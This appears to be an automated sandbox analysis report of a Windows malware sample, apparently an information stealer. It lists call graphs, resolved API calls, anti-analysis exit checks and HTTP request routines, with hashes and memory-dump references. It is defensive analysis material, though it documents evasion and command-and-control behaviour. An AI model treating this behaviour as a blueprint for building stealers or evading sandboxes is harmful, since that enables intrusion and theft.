calls 27301->27307 27302 e4faab lstrcpy 27302->27308 27303 e4f698 lstrcpy 27303->27315 27304->27291 27305 e4fbe7 lstrcpy 27305->27315 27306->27301 27327 e4fe13 27307->27327 27308->27260 27308->27261 27308->27262 27308->27263 27308->27264 27308->27265 27308->27267 27308->27269 27308->27270 27308->27271 27308->27275 27308->27281 27308->27286 27308->27288 27308->27292 27308->27294 27308->27296 27308->27297 27308->27302 27308->27305 27309 e4ee90 28 API calls 27308->27309 27308->27315 27316 e4f7e2 lstrcpy 27308->27316 27319 e4fafc lstrcpy 27308->27319 27309->27308 27311 e4fe08 27310->27311 27313 e4fe00 lstrcpy 27310->27313 27314 e31610 4 API calls 27311->27314 27312 e4efb0 35 API calls 27312->27315 27313->27311 27314->27327 27315->27266 27315->27268 27315->27269 27315->27271 27315->27277 27315->27299 27315->27303 27315->27308 27315->27312 27317 e4f924 lstrcpy 27315->27317 27318 e4f99e StrCmpCA 27315->27318 27320 e4fc3e lstrcpy 27315->27320 27321 e4fcb8 StrCmpCA 27315->27321 27322 e4f9cb lstrcpy 27315->27322 27323 e4fce9 lstrcpy 27315->27323 27324 e4ee90 28 API calls 27315->27324 27325 e4fa19 lstrcpy 27315->27325 27326 e4fd3a lstrcpy 27315->27326 27316->27308 27317->27315 27318->27269 27318->27315 27319->27308 27320->27315 27321->27271 27321->27315 27322->27315 27323->27315 27324->27315 27325->27315 27326->27315 27327->26351 27329 e52785 27328->27329 27330 e5278c GetVolumeInformationA 27328->27330 27329->27330 27331 e527ec GetProcessHeap RtlAllocateHeap 27330->27331 27333 e52826 wsprintfA 27331->27333 27334 e52822 27331->27334 27333->27334 27551 e571e0 27334->27551 27338 e34c70 27337->27338 27339 e34c85 27338->27339 27340 e34c7d lstrcpy 27338->27340 27555 e34bc0 27339->27555 27340->27339 27342 e34c90 27343 e34ccc lstrcpy 27342->27343 27344 e34cd8 27342->27344 27343->27344 27345 e34cff lstrcpy 27344->27345 27346 e34d0b 27344->27346 27345->27346 27347 e34d2f lstrcpy 27346->27347 27348 e34d3b 27346->27348 27347->27348 27349 e34d6d lstrcpy 27348->27349 27350 e34d79 27348->27350 27349->27350 27351 e34da0 lstrcpy 27350->27351 27352 e34dac InternetOpenA StrCmpCA 27350->27352 27351->27352 27353 e34de0 27352->27353 27354 e354b8 InternetCloseHandle CryptStringToBinaryA 27353->27354 27559 e53e70 27353->27559 27355 e354e8 LocalAlloc 27354->27355 27372 e355d8 27354->27372 27357 e354ff CryptStringToBinaryA 27355->27357 27355->27372 27358 e35517 LocalFree 27357->27358 27359 e35529 lstrlen 27357->27359 27358->27372 27360 e3553d 27359->27360 27363 e35563 lstrlen 27360->27363 27364 e35557 lstrcpy 27360->27364 27361 e34dfa 27362 e34e23 lstrcpy lstrcat 27361->27362 27365 e34e38 27361->27365 27362->27365 27367 e3557d 27363->27367 27364->27363 27366 e34e5a lstrcpy 27365->27366 27369 e34e62 27365->27369 27366->27369 27368 e3558f lstrcpy lstrcat 27367->27368 27370 e355a2 27367->27370 27368->27370 27371 e34e71 lstrlen 27369->27371 27373 e355d1 27370->27373 27375 e355c9 lstrcpy 27370->27375 27374 e34e89 27371->27374 27372->26380 27373->27372 27376 e34e95 lstrcpy lstrcat 27374->27376 27377 e34eac 27374->27377 27375->27373 27376->27377 27378 e34ed5 27377->27378 27379 e34ecd lstrcpy 27377->27379 27380 e34edc lstrlen 27378->27380 27379->27378 27381 e34ef2 27380->27381 27382 e34efe lstrcpy lstrcat 27381->27382 27383 e34f15 27381->27383 27382->27383 27384 e34f36 lstrcpy 27383->27384 27385 e34f3e 27383->27385 27384->27385 27386 e34f65 lstrcpy lstrcat 27385->27386 27387 e34f7b 27385->27387 27386->27387 27388 e34fa4 27387->27388 27389 e34f9c lstrcpy 27387->27389 27390 e34fab lstrlen 27388->27390 27389->27388 27391 e34fc1 27390->27391 27392 e34fcd lstrcpy lstrcat 27391->27392 27393 e34fe4 27391->27393 27392->27393 27394 e3500d 27393->27394 27395 e35005 lstrcpy 27393->27395 27396 e35014 lstrlen 27394->27396 27395->27394 27397 e3502a 27396->27397 27398 e35036 lstrcpy lstrcat 27397->27398 27399 e3504d 27397->27399 27398->27399 27400 e35079 27399->27400 27401 e35071 lstrcpy 27399->27401 27402 e35080 lstrlen 27400->27402 27401->27400 27403 e3509b 27402->27403 27404 e350ac lstrcpy lstrcat 27403->27404 27405 e350bc 27403->27405 27404->27405 27406 e350da lstrcpy lstrcat 27405->27406 27407 e350ed 27405->27407 27406->27407 27408 e3510b lstrcpy 27407->27408 27409 e35113 27407->27409 27408->27409 27410 e35121 InternetConnectA 27409->27410 27410->27354 27411 e35150 HttpOpenRequestA 27410->27411 27412 e354b1 InternetCloseHandle 27411->27412 27413 e3518b 27411->27413 27412->27354 27566 e57310 lstrlen 27413->27566 27417 e351a4 27575 e572c0 27417->27575 27420 e57280 lstrcpy 27421 e351c0 27420->27421 27422 e57310 3 API calls 27421->27422 27423 e351d5 27422->27423 27424 e57280 lstrcpy 27423->27424 27425 e351de 27424->27425 27426 e57310 3 API calls 27425->27426 27427 e351f4 27426->27427 27428 e57280 lstrcpy 27427->27428 27429 e351fd 27428->27429 27430 e57310 3 API calls 27429->27430 27431 e35213 27430->27431 27432 e57280 lstrcpy 27431->27432 27433 e3521c 27432->27433 27434 e57310 3 API calls 27433->27434 27435 e35231 27434->27435 27436 e57280 lstrcpy 27435->27436 27437 e3523a 27436->27437 27438 e572c0 2 API calls 27437->27438 27439 e3524d 27438->27439 27440 e57280 lstrcpy 27439->27440 27441 e35256 27440->27441 27442 e57310 3 API calls 27441->27442 27443 e3526b 27442->27443 27444 e57280 lstrcpy 27443->27444 27445 e35274 27444->27445 27446 e57310 3 API calls 27445->27446 27447 e35289 27446->27447 27448 e57280 lstrcpy 27447->27448 27449 e35292 27448->27449 27450 e572c0 2 API calls 27449->27450 27451 e352a5 27450->27451 27452 e57280 lstrcpy 27451->27452 27453 e352ae 27452->27453 27454 e57310 3 API calls 27453->27454 27455 e352c3 27454->27455 27456 e57280 lstrcpy 27455->27456 27457 e352cc 27456->27457 27458 e57310 3 API calls 27457->27458 27459 e352e2 27458->27459 27460 e57280 lstrcpy 27459->27460 27461 e352eb 27460->27461 27462 e57310 3 API calls 27461->27462 27463 e35301 27462->27463 27464 e57280 lstrcpy 27463->27464 27465 e3530a 27464->27465 27466 e57310 3 API calls 27465->27466 27467 e3531f 27466->27467 27468 e57280 lstrcpy 27467->27468 27469 e35328 27468->27469 27470 e572c0 2 API calls 27469->27470 27471 e3533b 27470->27471 27472 e57280 lstrcpy 27471->27472 27473 e35344 27472->27473 27474 e35370 lstrcpy 27473->27474 27475 e3537c 27473->27475 27474->27475 27476 e572c0 2 API calls 27475->27476 27477 e3538a 27476->27477 27478 e572c0 2 API calls 27477->27478 27479 e35397 27478->27479 27480 e57280 lstrcpy 27479->27480 27481 e353a1 27480->27481 27482 e353b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27481->27482 27483 e3549c InternetCloseHandle 27482->27483 27487 e353f2 27482->27487 27484 e354ae 27483->27484 27484->27412 27485 e353fd lstrlen 27485->27487 27486 e3542e lstrcpy lstrcat 27486->27487 27487->27483 27487->27485 27487->27486 27488 e35473 27487->27488 27489 e3546b lstrcpy 27487->27489 27490 e3547a InternetReadFile 27488->27490 27489->27488 27490->27483 27490->27487 27492 e48cc6 ExitProcess 27491->27492 27493 e48ccd 27491->27493 27494 e48ee2 27493->27494 27495 e48d84 StrCmpCA 27493->27495 27496 e48da4 StrCmpCA 27493->27496 27497 e48d06 lstrlen 27493->27497 27498 e48e6f StrCmpCA 27493->27498 27499 e48e88 lstrlen 27493->27499 27500 e48e56 StrCmpCA 27493->27500 27501 e48d30 lstrlen 27493->27501 27502 e48dbd StrCmpCA 27493->27502 27503 e48ddd StrCmpCA 27493->27503 27504 e48dfd StrCmpCA 27493->27504 27505 e48e1d StrCmpCA 27493->27505 27506 e48e3d StrCmpCA 27493->27506 27507 e48d5a lstrlen 27493->27507 27508 e48ebb lstrcpy 27493->27508 27494->26382 27495->27493 27496->27493 27497->27493 27498->27493 27499->27493 27500->27493 27501->27493 27502->27493 27503->27493 27504->27493 27505->27493 27506->27493 27507->27493 27508->27493 27509->26388 27510->26390 27511->26396 27512->26398 27513->26404 27514->26406 27515->26412 27516->26416 27517->26422 27518->26424 27519->26428 27520->26442 27521->26446 27522->26445 27523->26441 27524->26445 27525->26461 27526->26448 27527->26451 27528->26452 27529->26458 27530->26463 27531->26465 27532->26472 27533->26479 27534->26499 27535->26503 27536->26502 27537->26497 27538->26502 27539->26512 27542 e3161f 27541->27542 27543 e3162b lstrcpy 27542->27543 27544 e31633 27542->27544 27543->27544 27545 e3164d lstrcpy 27544->27545 27546 e31655 27544->27546 27545->27546 27547 e3166f lstrcpy 27546->27547 27548 e31677 27546->27548 27547->27548 27549 e31699 27548->27549 27550 e31691 lstrcpy 27548->27550 27549->27234 27550->27549 27552 e571e6 27551->27552 27553 e52860 27552->27553 27554 e571fc lstrcpy 27552->27554 27553->26377 27554->27553 27556 e34bd0 27555->27556 27556->27556 27557 e34bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27556->27557 27558 e34c41 27557->27558 27558->27342 27560 e53e83 27559->27560 27561 e53e9f lstrcpy 27560->27561 27562 e53eab 27560->27562 27561->27562 27563 e53ed5 GetSystemTime 27562->27563 27564 e53ecd lstrcpy 27562->27564 27565 e53ef3 27563->27565 27564->27563 27565->27361 27568 e5732d 27566->27568 27567 e3519b 27571 e57280 27567->27571 27568->27567 27569 e5733d lstrcpy 27568->27569 27570 e57348 lstrcat 27569->27570 27570->27567 27573 e5728c 27571->27573 27572 e572b4 27572->27417 27573->27572 27574 e572ac lstrcpy 27573->27574 27574->27572 27576 e572dc 27575->27576 27577 e351b7 27576->27577 27578 e572ed lstrcpy lstrcat 27576->27578 27577->27420 27578->27577 27602 e531f0 GetSystemInfo wsprintfA 27594 e38c79 malloc strcpy_s 27619 e3bbf9 90 API calls 27630 e31b64 162 API calls 27611 e4f2f8 93 API calls 27579 e4e0f9 140 API calls 27631 e46b79 138 API calls 27632 e48615 49 API calls 27580 e53cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27620 e533c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27596 e4e049 147 API calls 27621 e48615 48 API calls 27633 e57348 lstrcat 27581 e52cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27597 e52853 lstrcpy 27603 e401d9 126 API calls 27608 e43959 244 API calls 27582 e530a0 GetSystemPowerStatus 27604 e529a0 GetCurrentProcess IsWow64Process 27622 e423a9 298 API calls 27635 e44b29 304 API calls 27609 e53130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27623 e4abb2 120 API calls 27612 e316b9 200 API calls 27617 e3f639 144 API calls 27637 e3bf39 177 API calls 27583 e52880 10 API calls 27584 e54480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27585 e53480 6 API calls 27613 e53280 7 API calls 27639 e3b309 98 API calls 27586 e48c88 16 API calls 27598 e3100d GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27610 e54e35 8 API calls 27640 e59711 14 API calls __setmbcp 27599 e52c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27624 e3db99 674 API calls 27588 e5749e memset malloc ctype 27589 e42499 290 API calls 27625 e48615 47 API calls

                              Executed Functions

                              Function 00E34C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E34C7F
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34CD2
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34D05
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34D35
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34D73
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34DA6
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E34DB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: 28498b444cc7e348516d74dbd30b3bf3361cec1190b6af2eda691732299a259b
                              • Instruction ID: b6059b3355154e2f0c18bb717f68979c043b2d89885932d8870651d7e387e7b3
                              • Opcode Fuzzy Hash: 28498b444cc7e348516d74dbd30b3bf3361cec1190b6af2eda691732299a259b
                              • Instruction Fuzzy Hash: 05529D729003159FDB21EFA4D849AAE7BF9AF44304F156428FA85BB251DB35EC41CBA0
                              Function 00E56390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2125 e56390-e563bd GetPEB 2126 e565c3-e56623 LoadLibraryA * 5 2125->2126 2127 e563c3-e565be call e562f0 GetProcAddress * 20 2125->2127 2129 e56625-e56633 GetProcAddress 2126->2129 2130 e56638-e5663f 2126->2130 2127->2126 2129->2130 2131 e56641-e56667 GetProcAddress * 2 2130->2131 2132 e5666c-e56673 2130->2132 2131->2132 2134 e56675-e56683 GetProcAddress 2132->2134 2135 e56688-e5668f 2132->2135 2134->2135 2136 e566a4-e566ab 2135->2136 2137 e56691-e5669f GetProcAddress 2135->2137 2139 e566d7-e566da 2136->2139 2140 e566ad-e566d2 GetProcAddress * 2 2136->2140 2137->2136 2140->2139
                              APIs
                              • GetProcAddress.KERNEL32(76210000,00D21750), ref: 00E563E9
                              • GetProcAddress.KERNEL32(76210000,00D21540), ref: 00E56402
                              • GetProcAddress.KERNEL32(76210000,00D21660), ref: 00E5641A
                              • GetProcAddress.KERNEL32(76210000,00D215A0), ref: 00E56432
                              • GetProcAddress.KERNEL32(76210000,00D288F8), ref: 00E5644B
                              • GetProcAddress.KERNEL32(76210000,00D16740), ref: 00E56463
                              • GetProcAddress.KERNEL32(76210000,00D16720), ref: 00E5647B
                              • GetProcAddress.KERNEL32(76210000,00D21768), ref: 00E56494
                              • GetProcAddress.KERNEL32(76210000,00D21558), ref: 00E564AC
                              • GetProcAddress.KERNEL32(76210000,00D215E8), ref: 00E564C4
                              • GetProcAddress.KERNEL32(76210000,00D21570), ref: 00E564DD
                              • GetProcAddress.KERNEL32(76210000,00D16860), ref: 00E564F5
                              • GetProcAddress.KERNEL32(76210000,00D216D8), ref: 00E5650D
                              • GetProcAddress.KERNEL32(76210000,00D215D0), ref: 00E56526
                              • GetProcAddress.KERNEL32(76210000,00D16780), ref: 00E5653E
                              • GetProcAddress.KERNEL32(76210000,00D21600), ref: 00E56556
                              • GetProcAddress.KERNEL32(76210000,00D21780), ref: 00E5656F
                              • GetProcAddress.KERNEL32(76210000,00D16920), ref: 00E56587
                              • GetProcAddress.KERNEL32(76210000,00D216F0), ref: 00E5659F
                              • GetProcAddress.KERNEL32(76210000,00D16A20), ref: 00E565B8
                              • LoadLibraryA.KERNEL32(00D217B0,?,?,?,00E51C03), ref: 00E565C9
                              • LoadLibraryA.KERNEL32(00D21708,?,?,?,00E51C03), ref: 00E565DB
                              • LoadLibraryA.KERNEL32(00D217E0,?,?,?,00E51C03), ref: 00E565ED
                              • LoadLibraryA.KERNEL32(00D21588,?,?,?,00E51C03), ref: 00E565FE
                              • LoadLibraryA.KERNEL32(00D21618,?,?,?,00E51C03), ref: 00E56610
                              • GetProcAddress.KERNEL32(75B30000,00D217F8), ref: 00E5662D
                              • GetProcAddress.KERNEL32(751E0000,00D21630), ref: 00E56649
                              • GetProcAddress.KERNEL32(751E0000,00D21648), ref: 00E56661
                              • GetProcAddress.KERNEL32(76910000,00D28F60), ref: 00E5667D
                              • GetProcAddress.KERNEL32(75670000,00D168A0), ref: 00E56699
                              • GetProcAddress.KERNEL32(77310000,00D28958), ref: 00E566B5
                              • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00E566CC
                              Strings
                              • NtQueryInformationProcess, xrefs: 00E566C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: aab36e205ddbb36d5c1278a04430545ede67717be98a96d603051446401ec148
                              • Instruction ID: 5588fcf93f813da705e9dbf3400deaf44587e03ddacec28e5f06cb226a1aeb24
                              • Opcode Fuzzy Hash: aab36e205ddbb36d5c1278a04430545ede67717be98a96d603051446401ec148
                              • Instruction Fuzzy Hash: 53A162B56153009FE774DFA4E958A2637B9F788749300891AF995C3B2CDB7EA900CF60
                              Function 00E51BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2141 e51bf0-e51c0b call e32a90 call e56390 2146 e51c0d 2141->2146 2147 e51c1a-e51c27 call e32930 2141->2147 2148 e51c10-e51c18 2146->2148 2151 e51c35-e51c63 2147->2151 2152 e51c29-e51c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 e51c65-e51c67 ExitProcess 2151->2156 2157 e51c6d-e51c7b GetSystemInfo 2151->2157 2152->2151 2158 e51c85-e51ca0 call e31030 call e310c0 GetUserDefaultLangID 2157->2158 2159 e51c7d-e51c7f ExitProcess 2157->2159 2164 e51ca2-e51ca9 2158->2164 2165 e51cb8-e51cca call e52ad0 call e53e10 2158->2165 2164->2165 2167 e51cb0-e51cb2 ExitProcess 2164->2167 2171 e51ce7-e51d06 lstrlen call e32930 2165->2171 2172 e51ccc-e51cde call e52a40 call e53e10 2165->2172 2178 e51d23-e51d40 lstrlen call e32930 2171->2178 2179 e51d08-e51d0d 2171->2179 2172->2171 2185 e51ce0-e51ce1 ExitProcess 2172->2185 2186 e51d42-e51d44 2178->2186 2187 e51d5a-e51d7b call e52ad0 lstrlen call e32930 2178->2187 2179->2178 2182 e51d0f-e51d11 2179->2182 2182->2178 2183 e51d13-e51d1d lstrcpy lstrcat 2182->2183 2183->2178 2186->2187 2188 e51d46-e51d54 lstrcpy lstrcat 2186->2188 2193 e51d7d-e51d7f 2187->2193 2194 e51d9a-e51db4 lstrlen call e32930 2187->2194 2188->2187 2193->2194 2195 e51d81-e51d85 2193->2195 2199 e51db6-e51db8 2194->2199 2200 e51dce-e51deb call e52a40 lstrlen call e32930 2194->2200 2195->2194 2198 e51d87-e51d94 lstrcpy lstrcat 2195->2198 2198->2194 2199->2200 2201 e51dba-e51dc8 lstrcpy lstrcat 2199->2201 2206 e51ded-e51def 2200->2206 2207 e51e0a-e51e0f 2200->2207 2201->2200 2206->2207 2208 e51df1-e51df5 2206->2208 2209 e51e16-e51e22 call e32930 2207->2209 2210 e51e11 call e32a20 2207->2210 2208->2207 2211 e51df7-e51e04 lstrcpy lstrcat 2208->2211 2215 e51e24-e51e26 2209->2215 2216 e51e30-e51e66 call e32a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 e51e28-e51e2a lstrcpy 2215->2217 2228 e51e8c-e51ea0 CreateEventA call e51b20 call e4ffd0 2216->2228 2229 e51e68-e51e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 e51ea5-e51eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                              APIs
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21750), ref: 00E563E9
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21540), ref: 00E56402
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21660), ref: 00E5641A
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D215A0), ref: 00E56432
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D288F8), ref: 00E5644B
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D16740), ref: 00E56463
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D16720), ref: 00E5647B
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21768), ref: 00E56494
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21558), ref: 00E564AC
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D215E8), ref: 00E564C4
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21570), ref: 00E564DD
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D16860), ref: 00E564F5
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D216D8), ref: 00E5650D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E51C2F
                              • ExitProcess.KERNEL32 ref: 00E51C67
                              • GetSystemInfo.KERNEL32(?), ref: 00E51C71
                              • ExitProcess.KERNEL32 ref: 00E51C7F
                                • Part of subcall function 00E31030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E31046
                                • Part of subcall function 00E31030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E3104D
                                • Part of subcall function 00E31030: ExitProcess.KERNEL32 ref: 00E31058
                                • Part of subcall function 00E310C0: GlobalMemoryStatusEx.KERNEL32 ref: 00E310EA
                                • Part of subcall function 00E310C0: ExitProcess.KERNEL32 ref: 00E31114
                              • GetUserDefaultLangID.KERNEL32 ref: 00E51C8F
                              • ExitProcess.KERNEL32 ref: 00E51CB2
                              • ExitProcess.KERNEL32 ref: 00E51CE1
                              • lstrlen.KERNEL32(00D28AB8), ref: 00E51CEE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E51D15
                              • lstrcat.KERNEL32(00000000,00D28AB8), ref: 00E51D1D
                              • lstrlen.KERNEL32(00E64B98), ref: 00E51D28
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D48
                              • lstrcat.KERNEL32(00000000,00E64B98), ref: 00E51D54
                              • lstrlen.KERNEL32(00000000), ref: 00E51D63
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D89
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51D94
                              • lstrlen.KERNEL32(00E64B98), ref: 00E51D9F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51DBC
                              • lstrcat.KERNEL32(00000000,00E64B98), ref: 00E51DC8
                              • lstrlen.KERNEL32(00000000), ref: 00E51DD7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51DF9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51E04
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                              • String ID:
                              • API String ID: 3366406952-0
                              • Opcode ID: fccfde7c83931f46cccc67651c6307da252ed6b4b3fbb0399ff8a6e43d1a7fc8
                              • Instruction ID: 278067602482f93bda76b3f82c144a0ab23ac593ae00ace606709e8cec4f628a
                              • Opcode Fuzzy Hash: fccfde7c83931f46cccc67651c6307da252ed6b4b3fbb0399ff8a6e43d1a7fc8
                              • Instruction Fuzzy Hash: 5871B131540305AFDB31ABB0DC4DB6E7BB9AF4074AF046868FE86B6195DB399805CB60
                              Function 00E36C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
